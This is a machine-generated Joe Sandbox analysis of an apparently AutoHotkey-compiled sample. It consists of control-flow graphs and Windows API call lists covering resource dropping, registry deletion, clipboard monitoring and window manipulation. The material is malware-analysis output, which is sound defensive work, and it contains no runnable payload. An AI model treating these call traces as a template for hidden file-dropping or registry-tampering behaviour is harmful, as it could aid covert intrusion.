    control_flow_graph 6395 472770-472780 6396 472786-47278a 6395->6396 6397 4728da-4728e1 6395->6397 6396->6397 6398 472790-472792 6396->6398 6399 472795-47279a 6398->6399 6399->6399 6400 47279c-4727a7 6399->6400 6400->6397 6401 4727ad-4727b1 6400->6401 6402 4727ba-4727c9 call 485791 6401->6402 6403 4727b3-4727b8 call 409310 6401->6403 6408 4727cb-4727ce 6402->6408 6409 4727d0-4727e2 call 4868d6 6402->6409 6403->6402 6411 47280f-472839 call 487740 call 485791 6408->6411 6409->6397 6414 4727e8-4727f8 call 485791 6409->6414 6421 47283b 6411->6421 6422 47288e-47289c FindFirstFileA 6411->6422 6414->6411 6420 4727fa-47280a call 485791 6414->6420 6420->6411 6431 47280c 6420->6431 6425 472840-472854 FindFirstFileA 6421->6425 6422->6397 6424 47289e-4728cd FindClose call 4719e0 6422->6424 6433 4728d0-4728d8 6424->6433 6425->6397 6428 47285a-47288c FindClose call 4719e0 call 485791 6425->6428 6428->6422 6428->6425 6431->6411 6433->6397 6433->6433
    APIs
    • __Stoull.NTSTC_LIBCMT ref: 004727D8
    • _strncpy.LIBCMT ref: 0047281A
    • FindFirstFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0047284C
    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0047285B
    • FindFirstFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00472897
    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0047289F
      • Part of subcall function 004719E0: _vswprintf_s.LIBCMT ref: 00471A13
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 7278 440630-440647 call 40cdf0 7281 440649-440656 call 486124 7278->7281 7282 440658-44065e call 485d26 7278->7282 7287 440661-440664 7281->7287 7282->7287 7288 440666 call 452490 7287->7288 7289 4406c6-4406e1 CreateFileA 7287->7289 7296 44066b-44066d 7288->7296 7290 440714-440719 7289->7290 7291 4406e3-4406f0 7289->7291 7295 440720-440725 7290->7295 7293 4406f2-440711 call 474680 7291->7293 7294 4406a1-4406c3 call 42d230 7291->7294 7295->7295 7297 440727-44072e 7295->7297 7296->7289 7299 44066f-44067b 7296->7299 7303 440735-440765 call 48d0a0 call 4870fe FindResourceA 7297->7303 7304 440730 7297->7304 7299->7294 7305 44067d-44069e call 474680 7299->7305 7312 440767-440772 LoadResource 7303->7312 7313 4407a1 7303->7313 7304->7303 7312->7313 7315 440774-44077f LockResource 7312->7315 7314 4407a3-4407ca CloseHandle call 42d320 7313->7314 7315->7313 7317 440781-44079f SizeofResource WriteFile 7315->7317 7317->7314
    APIs
    • CloseHandle.KERNEL32(00000000), ref: 004407A4
      • Part of subcall function 00452490: GetFileAttributesA.KERNELBASE(004987E9), ref: 004524B5
      • Part of subcall function 00452490: FindFirstFileA.KERNEL32(004987E9,00000000), ref: 004524CD
      • Part of subcall function 00452490: FindClose.KERNEL32(00000000), ref: 004524E2
    • CreateFileA.KERNEL32(004987E9,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004406D6
    • __mbsupr.LIBCMT ref: 0044074A
    • FindResourceA.KERNEL32(00000000,?,0000000A), ref: 0044075B
    • LoadResource.KERNEL32(00000000,00000000), ref: 0044076A
    • LockResource.KERNEL32(00000000), ref: 00440775
    • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 0044078B
    • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 00440794
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetFileAttributesA.KERNELBASE(004987E9), ref: 004524B5
    • FindFirstFileA.KERNEL32(004987E9,00000000), ref: 004524CD
    • FindClose.KERNEL32(00000000), ref: 004524E2
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_0008D610), ref: 0048D657
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • RegisterClipboardFormatA.USER32(TaskbarCreated), ref: 00438571
    • SetFocus.USER32(000801CA), ref: 004386BA
      • Part of subcall function 0046A070: GetIconInfo.USER32(?,?), ref: 0046A0BE
      • Part of subcall function 0046A070: GetObjectA.GDI32(?,00000018,?), ref: 0046A0D4
      • Part of subcall function 0046A070: DeleteObject.GDI32(?), ref: 0046A0FC
      • Part of subcall function 0046A070: DeleteObject.GDI32(?), ref: 0046A103
      • Part of subcall function 0046A120: DrawIconEx.USER32(?,?,?,?,00000000,00000000,00000000,00000000,00000003), ref: 0046A17F
      • Part of subcall function 00439040: PostMessageA.USER32(?,00000402,?,?), ref: 004391FE
    • ShowWindow.USER32(000601DA,00000000), ref: 004387CA
    • MoveWindow.USER32(000801CA,00000000,00000000,?,?,00000001), ref: 004387F2
    • GetSysColor.USER32(0000000F), ref: 004388C7
    • SetBkColor.GDI32(?,?), ref: 004388CF
    • SetTextColor.GDI32(?,?), ref: 004388E1
    • GetSysColorBrush.USER32(0000000F), ref: 004388FB
    • CreateCompatibleDC.GDI32(?), ref: 00438934
    • SelectObject.GDI32(00000000,?), ref: 00438941
    • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 00438966
    • SelectObject.GDI32(00000000,?), ref: 00438972
    • DeleteDC.GDI32(00000000), ref: 00438979
    • DrawIconEx.USER32(?,?,?,?,?,?,00000000,00000000,00000003), ref: 00438999
    • ExcludeClipRect.GDI32(?,?,?,?,?), ref: 004389B1
    • CreateRectRgn.GDI32(00000000,00000000,00000001,00000001), ref: 004389BF
    • GetClipRgn.GDI32(?,00000000), ref: 004389C9
    • GetSysColorBrush.USER32(0000000F), ref: 004389DC
    • FillRgn.GDI32(?,00000000,00000000), ref: 004389E5
    • DeleteObject.GDI32(00000000), ref: 004389EC
    • GetClipBox.GDI32(?,00000000), ref: 00438A10
    • FillRect.USER32(?,?,?), ref: 00438A20
    • GetClientRect.USER32(?,?), ref: 00438A5B
    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00438AB4
    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00438AD2
    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00438AF5
    • InvalidateRect.USER32(?,?,00000001), ref: 00438B06
    • ShowWindow.USER32(000601DA,00000000), ref: 00438B6E
    • GetMenu.USER32(000601DA), ref: 00438B9A
    • CheckMenuItem.USER32(00000000), ref: 00438BA1
      • Part of subcall function 00415670: _strncpy.LIBCMT ref: 004156F2
      • Part of subcall function 00415670: Shell_NotifyIcon.SHELL32 ref: 00415701
      • Part of subcall function 00415720: LoadImageA.USER32(00400000,?,00000001,00000000,00000000,00008000), ref: 004157DB
      • Part of subcall function 00415720: Shell_NotifyIcon.SHELL32(00000001,004AC10A), ref: 004157F0
    • DefWindowProcA.USER32(?,?,?,?), ref: 00438C00
    • SendMessageTimeoutA.USER32(00000000,0000030D,?,?,00000002,000007D0,?), ref: 00438C4F
    • PostMessageA.USER32(00000000,?,?,?), ref: 00438C81
      • Part of subcall function 00403690: GetTickCount.KERNEL32(0040171F), ref: 004036C2
    • PostMessageA.USER32(000601DA,00000415,00000000,00000000), ref: 00438CD0
    • SendMessageTimeoutA.USER32(00000000,?,?,?,00000002,000007D0,?), ref: 00438CF2
      • Part of subcall function 00469B70: CheckMenuItem.USER32(?,0000FF19,?), ref: 00469BCB
      • Part of subcall function 00469B70: CheckMenuItem.USER32(?,0000FF1A,?), ref: 00469BEB
      • Part of subcall function 00469B70: GetCursorPos.USER32(?), ref: 00469C06
      • Part of subcall function 00469B70: GetForegroundWindow.USER32 ref: 00469C52
      • Part of subcall function 00469B70: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00469C67
      • Part of subcall function 00469B70: SetForegroundWindow.USER32(000601DA), ref: 00469C82
      • Part of subcall function 00469B70: SetForegroundWindow.USER32(000601DA), ref: 00469CA9
      • Part of subcall function 00469B70: TrackPopupMenuEx.USER32(?,00000000,?,?,000601DA,00000000), ref: 00469CCE
      • Part of subcall function 00469B70: PostMessageA.USER32(000601DA,00000000,00000000,00000000), ref: 00469CF3
      • Part of subcall function 00469B70: GetForegroundWindow.USER32 ref: 00469D03
      • Part of subcall function 00469B70: SetForegroundWindow.USER32(00000000), ref: 00469D12
      • Part of subcall function 0042A650: _strncpy.LIBCMT ref: 0042A6C6
      • Part of subcall function 0042A650: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,00000000,00000064), ref: 0042A724
      • Part of subcall function 0042A650: GetTickCount.KERNEL32(00000000,00000064), ref: 0042A780
      • Part of subcall function 0042A650: GetTickCount.KERNEL32(00000000,00000064), ref: 0042A7CC
      • Part of subcall function 0042A650: GetTickCount.KERNEL32 ref: 0042A806
    • PostMessageA.USER32(?,00000402,?,00000001), ref: 00438D79
    • GetCurrentProcessId.KERNEL32 ref: 00438EC4
      • Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script.), ref: 0043931A
      • Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,?), ref: 004393D2
      • Part of subcall function 004392C0: IsWindowVisible.USER32(000601DA), ref: 004393DA
      • Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000005), ref: 004393F3
      • Part of subcall function 004392C0: IsIconic.USER32(000601DA), ref: 004393FC
      • Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000009), ref: 0043940E
      • Part of subcall function 004392C0: GetForegroundWindow.USER32 ref: 00439410
      • Part of subcall function 004392C0: SetForegroundWindow.USER32(000601DA), ref: 00439421
      • Part of subcall function 004392C0: SendMessageA.USER32(000801CA,000000B6,00000000,000F423F), ref: 0043944C
    • GlobalUnWire.KERNEL32(00000000), ref: 00438DC7
    • CloseClipboard.USER32 ref: 00438DD3
    • GetCurrentProcessId.KERNEL32 ref: 00438DE5
    • EnumWindows.USER32(00476430,?), ref: 00438DFD
      • Part of subcall function 00475520: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0047553B
      • Part of subcall function 00475520: GetForegroundWindow.USER32 ref: 0047555A
      • Part of subcall function 00475520: FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0047556C
      • Part of subcall function 00475520: IsIconic.USER32(00000000), ref: 00475583
      • Part of subcall function 00475520: ShowWindow.USER32(00000000,00000009), ref: 00475590
      • Part of subcall function 00475520: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004755C1
      • Part of subcall function 00475520: AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 004755E7
      • Part of subcall function 00475520: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00475600
      • Part of subcall function 00475520: SetForegroundWindow.USER32(00000000), ref: 00475621
      • Part of subcall function 00475520: GetForegroundWindow.USER32 ref: 00475643
      • Part of subcall function 00475520: GetWindow.USER32(00000000,00000004), ref: 0047565A
      • Part of subcall function 00475520: AttachThreadInput.USER32(00000E10,?,00000000), ref: 004756BE
      • Part of subcall function 00475520: AttachThreadInput.USER32(?,?,00000000), ref: 004756D7
      • Part of subcall function 00475520: BringWindowToTop.USER32(00000000), ref: 004756E2
    • PostMessageA.USER32(?,?,?,?), ref: 00438E4E
    • SetTimer.USER32(?,00000000,?,004036F0), ref: 00438E33
      • Part of subcall function 00415A90: MessageBoxA.USER32(000601DA,?,001B2734,00010000), ref: 00415AF2
      • Part of subcall function 00415A90: IsWindow.USER32(000601DA), ref: 00415AFE
      • Part of subcall function 00415A90: DestroyWindow.USER32(000601DA), ref: 00415B16
      • Part of subcall function 00415A90: _strncpy.LIBCMT ref: 00415B90
      • Part of subcall function 00415A90: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,00000000,004A8ED0,001BC918,00000000), ref: 00415BE9
    • IsWindow.USER32(?), ref: 00438EA5
    • GetWindowTextA.USER32(?,?,00000064), ref: 00438EB3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd

    Control-flow Graph

    APIs
    • GetSystemMetrics.USER32(00000031), ref: 004152B0
    • LoadCursorA.USER32(00000000,00007F00), ref: 004152E0
    • RegisterClassExA.USER32 ref: 00415305
    • RegisterClassExA.USER32(?), ref: 0041534A
    • GetForegroundWindow.USER32 ref: 00415351
    • GetClassNameA.USER32(00000000,?,00000040), ref: 00415363
    • CreateWindowExA.USER32(00000001,AutoHotkey,?,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00400000,00000000), ref: 004153D6
    • GetMenu.USER32(00000000), ref: 0041540B
    • EnableMenuItem.USER32(00000000,0000FF79,00000003), ref: 0041541B
      • Part of subcall function 00415640: EnableMenuItem.USER32(00000000,0000FF81,00000003), ref: 0041564E
      • Part of subcall function 00415640: EnableMenuItem.USER32(00000000,0000FF7E,00000003), ref: 00415657
      • Part of subcall function 00415640: EnableMenuItem.USER32(00000000,0000FF7F,00000003), ref: 00415660
      • Part of subcall function 00415640: EnableMenuItem.USER32(00000000,0000FF80,00000003), ref: 00415669
    • CreateWindowExA.USER32(00000000,edit,00000000,50A00804,00000000,00000000,00000000,00000000,000601DA,00000001,00400000,00000000), ref: 00415453
    • GetDC.USER32(00000000), ref: 0041545F
    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00415499
    • MulDiv.KERNEL32(0000000A,00000000), ref: 004154A2
    • CreateFontA.GDI32(00000000), ref: 004154AB
    • ReleaseDC.USER32(000801CA,00000000), ref: 004154BD
    • SendMessageA.USER32(000801CA,00000030,3C0A0928,00000000), ref: 004154DB
    • SendMessageA.USER32(000801CA,000000C5,00000000,00000000), ref: 004154EC
    • ShowWindow.USER32(000601DA,00000000), ref: 004154FD
    • ShowWindow.USER32(000601DA,00000000), ref: 00415508
    • ShowWindow.USER32(000601DA,00000006), ref: 00415519
    • SetWindowLongA.USER32(000601DA,000000EC,00000000), ref: 00415526
    • LoadAcceleratorsA.USER32(00400000,000000D4), ref: 00415538
      • Part of subcall function 00415670: _strncpy.LIBCMT ref: 004156F2
      • Part of subcall function 00415670: Shell_NotifyIcon.SHELL32 ref: 00415701
      • Part of subcall function 00415590: PostMessageA.USER32(000601DA,00000415,00000001,00000000), ref: 004155D4
      • Part of subcall function 00415590: SetClipboardViewer.USER32(000601DA), ref: 004155E7
      • Part of subcall function 00415590: ChangeClipboardChain.USER32(000601DA,?), ref: 00415629
      • Part of subcall function 004736A0: LoadLibraryExA.KERNEL32(?,00000000,00000002,?,761980C8,?,00000000,0000002C,004A8ED0,761980C8,00000000), ref: 004736BD
      • Part of subcall function 004736A0: EnumResourceNamesA.KERNEL32(00400000,0000000E,00473670,?), ref: 00473702
      • Part of subcall function 004736A0: FindResourceA.KERNEL32(00400000,?,0000000E), ref: 00473710
      • Part of subcall function 004736A0: LoadResource.KERNEL32(00400000,00000000,?,00000000,0000002C,004A8ED0,761980C8,00000000), ref: 00473720
      • Part of subcall function 004736A0: LockResource.KERNEL32(00000000,?,00000000,0000002C,004A8ED0,761980C8,00000000), ref: 0047372F
      • Part of subcall function 004736A0: GetSystemMetrics.USER32(0000000B), ref: 00473757
      • Part of subcall function 004736A0: FindResourceA.KERNEL32(00400000,?,00000003), ref: 004737AF
      • Part of subcall function 004736A0: LoadResource.KERNEL32(00400000,00000000), ref: 004737BD
      • Part of subcall function 004736A0: LockResource.KERNEL32(00000000), ref: 004737C8
      • Part of subcall function 004736A0: SizeofResource.KERNEL32(00400000,00000000,00000001,00030000,00000000,00000000,00000000), ref: 004737E3
      • Part of subcall function 004736A0: CreateIconFromResourceEx.USER32(00000000,00000000), ref: 004737EB
      • Part of subcall function 004736A0: FreeLibrary.KERNEL32(00400000,?,00000000,0000002C,004A8ED0,761980C8,00000000), ref: 00473800
      • Part of subcall function 004736A0: ExtractIconA.SHELL32(00000000,?,?), ref: 00473818
      • Part of subcall function 004736A0: ExtractIconA.SHELL32(00000000,?,-00000001), ref: 00473834
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 0042814F
    • GetLastError.KERNEL32 ref: 004281DF
      • Part of subcall function 0046EBF0: RegEnumKeyExA.ADVAPI32 ref: 0046EC27
      • Part of subcall function 0046EBF0: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,?,?), ref: 0046EC5A
      • Part of subcall function 0046EBF0: RegCloseKey.ADVAPI32(00000000,00000000), ref: 0046EC76
      • Part of subcall function 0046EBF0: RegDeleteKeyA.ADVAPI32(?,?), ref: 0046EC86
      • Part of subcall function 0046EBF0: RegEnumKeyExA.ADVAPI32 ref: 0046ECAE
    • RegCloseKey.ADVAPI32(?), ref: 00428179
    • GetModuleHandleA.KERNEL32(advapi32,RegDeleteKeyExA), ref: 0042819D
    • GetProcAddress.KERNEL32(00000000), ref: 004281A4
    • RegDeleteKeyA.ADVAPI32(?,?), ref: 004281F0
      • Part of subcall function 00413770: _strncpy.LIBCMT ref: 00413989
      • Part of subcall function 00413770: RegConnectRegistryA.ADVAPI32(?), ref: 004139AB
      • Part of subcall function 0046ECE0: RegOpenKeyExA.ADVAPI32(00000000,?,00000000,?,?,?,?,?,004282B1,?,004987E9), ref: 0046ED1C
      • Part of subcall function 0046ECE0: RegCloseKey.ADVAPI32(?,004987E9), ref: 0046ED44
      • Part of subcall function 0046ECE0: GetModuleHandleA.KERNEL32(advapi32,RegDeleteKeyExA), ref: 0046ED6B
      • Part of subcall function 0046ECE0: GetProcAddress.KERNEL32(00000000), ref: 0046ED72
      • Part of subcall function 0046ECE0: GetLastError.KERNEL32(?,?,?,004282B1,?,004987E9), ref: 0046EDA6
      • Part of subcall function 0046ECE0: RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0046EDB0
      • Part of subcall function 0046ECE0: RegDeleteValueA.ADVAPI32(?,?,?,?,?,004282B1,?,004987E9), ref: 0046EDBA
      • Part of subcall function 0046ECE0: RegCloseKey.ADVAPI32(?,?,?,?,004282B1,?,004987E9), ref: 0046EDC7
    • RegCloseKey.ADVAPI32(00000000), ref: 004282BF
      • Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1480 48c8c2-48c8fa call 490f70 1483 48c903-48c905 1480->1483 1484 48c8fc-48c8fe 1480->1484 1485 48c907-48c921 call 48921b call 489208 call 4891b6 1483->1485 1486 48c926-48c954 1483->1486 1487 48cfb1-48cfbe call 48b884 1484->1487 1485->1487 1490 48c95b-48c963 1486->1490 1491 48c956-48c959 1486->1491 1494 48c982-48c987 1490->1494 1495 48c965-48c97d call 48921b call 489208 call 4891b6 1490->1495 1491->1490 1491->1494 1496 48c989-48c995 call 48e62d 1494->1496 1497 48c998-48c9a1 call 48e7e5 1494->1497 1519 48cf9f-48cfa2 1495->1519 1496->1497 1510 48cc40 1497->1510 1511 48c9a7-48c9ae 1497->1511 1513 48cc42-48cc49 1510->1513 1511->1510 1514 48c9b4-48c9dc call 488a22 GetConsoleMode 1511->1514 1516 48cc4f-48cc5c 1513->1516 1517 48cef0-48cf0c WriteFile 1513->1517 1514->1513 1525 48c9e2-48c9e4 1514->1525 1523 48cc62-48cc6b 1516->1523 1524 48cd0a-48cd11 1516->1524 1521 48cf23-48cf29 GetLastError 1517->1521 1522 48cf0e-48cf21 1517->1522 1528 48cfb0 1519->1528 1531 48cf2f-48cf36 1521->1531 1522->1531 1529 48cc71-48cc7b 1523->1529 1530 48cf6e-48cf7b 1523->1530 1526 48cd17-48cd20 1524->1526 1527 48cde4-48cdf3 1524->1527 1532 48c9e6-48c9ec 1525->1532 1533 48c9f2-48ca0f GetConsoleCP 1525->1533 1526->1530 1536 48cd26-48cd3d 1526->1536 1527->1530 1540 48cdf9-48ce14 1527->1540 1528->1487 1539 48cc81-48cc84 1529->1539 1534 48cf8c-48cf9c call 489208 call 48921b 1530->1534 1535 48cf7d-48cf86 1530->1535 1537 48cfa4-48cfaa 1531->1537 1538 48cf38-48cf3f 1531->1538 1532->1513 1532->1533 1533->1538 1543 48ca15 1533->1543 1534->1519 1535->1534 1547 48cf88-48cf8a 1535->1547 1544 48cd3e-48cd41 1536->1544 1537->1528 1538->1530 1546 48cf41-48cf4a 1538->1546 1541 48ccac-48ccda WriteFile 1539->1541 1542 48cc86-48cc93 1539->1542 1545 48ce15-48ce18 1540->1545 1541->1521 1554 48cce0-48ccee 1541->1554 1549 48cca0-48ccaa 1542->1549 1550 48cc95-48cc9f 1542->1550 1553 48ca1b-48ca23 1543->1553 1551 48cd43-48cd53 1544->1551 1552 48cd86-48cdb4 WriteFile 1544->1552 1557 48ce55-48ce86 WideCharToMultiByte 1545->1557 1558 48ce1a-48ce2e 1545->1558 1555 48cf60-48cf6c call 48922e 1546->1555 1556 48cf4c-48cf5e call 489208 call 48921b 1546->1556 1547->1528 1549->1539 1549->1541 1550->1549 1562 48cd55-48cd69 1551->1562 1563 48cd6f-48cd84 1551->1563 1552->1521 1561 48cdba-48cdc8 1552->1561 1564 48ca29-48ca47 1553->1564 1565 48cb90-48cb92 1553->1565 1554->1531 1567 48ccf4-48ccff 1554->1567 1555->1519 1556->1519 1557->1521 1566 48ce8c-48ceb5 WriteFile 1557->1566 1569 48ce30-48ce38 1558->1569 1570 48ce3e-48ce53 1558->1570 1561->1531 1582 48cdce-48cdd9 1561->1582 1562->1563 1563->1544 1563->1552 1577 48ca49-48ca5c 1564->1577 1578 48ca5e-48ca6a call 48b715 1564->1578 1579 48cb94-48cb96 1565->1579 1580 48cb98-48cbb3 1565->1580 1575 48ceb7-48cebf 1566->1575 1576 48cec3-48cec9 GetLastError 1566->1576 1567->1529 1574 48cd05 1567->1574 1569->1570 1570->1545 1570->1557 1574->1531 1575->1566 1584 48cec1 1575->1584 1583 48cecf-48ced1 1576->1583 1586 48caa9-48cabb call 490f4f 1577->1586 1599 48caa6-48caa8 1578->1599 1600 48ca6c-48ca7c 1578->1600 1579->1580 1588 48cbb9-48cbbb 1579->1588 1580->1588 1582->1536 1589 48cddf 1582->1589 1583->1531 1591 48ced3-48cee8 1583->1591 1584->1583 1586->1531 1603 48cac1-48caec WideCharToMultiByte 1586->1603 1594 48cbc1-48cbd4 call 490df7 1588->1594 1595 48cbbd-48cbbf 1588->1595 1589->1531 1591->1540 1596 48ceee 1591->1596 1594->1521 1607 48cbda-48cbe8 1594->1607 1595->1594 1601 48cc13-48cc1c 1595->1601 1596->1531 1599->1586 1605 48cc27-48cc3b 1600->1605 1606 48ca82-48ca97 call 490f4f 1600->1606 1601->1553 1604 48cc22 1601->1604 1603->1531 1608 48caf2-48cb13 WriteFile 1603->1608 1604->1531 1605->1531 1606->1531 1615 48ca9d-48caa4 1606->1615 1607->1601 1610 48cbea-48cc01 call 490df7 1607->1610 1608->1521 1611 48cb19-48cb33 1608->1611 1610->1521 1618 48cc07-48cc0d 1610->1618 1611->1531 1613 48cb39-48cb40 1611->1613 1613->1601 1617 48cb46-48cb6c WriteFile 1613->1617 1615->1603 1617->1521 1619 48cb72-48cb79 1617->1619 1618->1601 1619->1531 1620 48cb7f-48cb8b 1619->1620 1620->1601
    APIs
    • __getptd.LIBCMT ref: 0048C9B4
      • Part of subcall function 00488A22: __amsg_exit.LIBCMT ref: 00488A32
    • GetConsoleMode.KERNEL32(00000000,?), ref: 0048C9D2
    • GetConsoleCP.KERNEL32 ref: 0048C9F2
      • Part of subcall function 0048B715: __isleadbyte_l.LIBCMT ref: 0048B71F
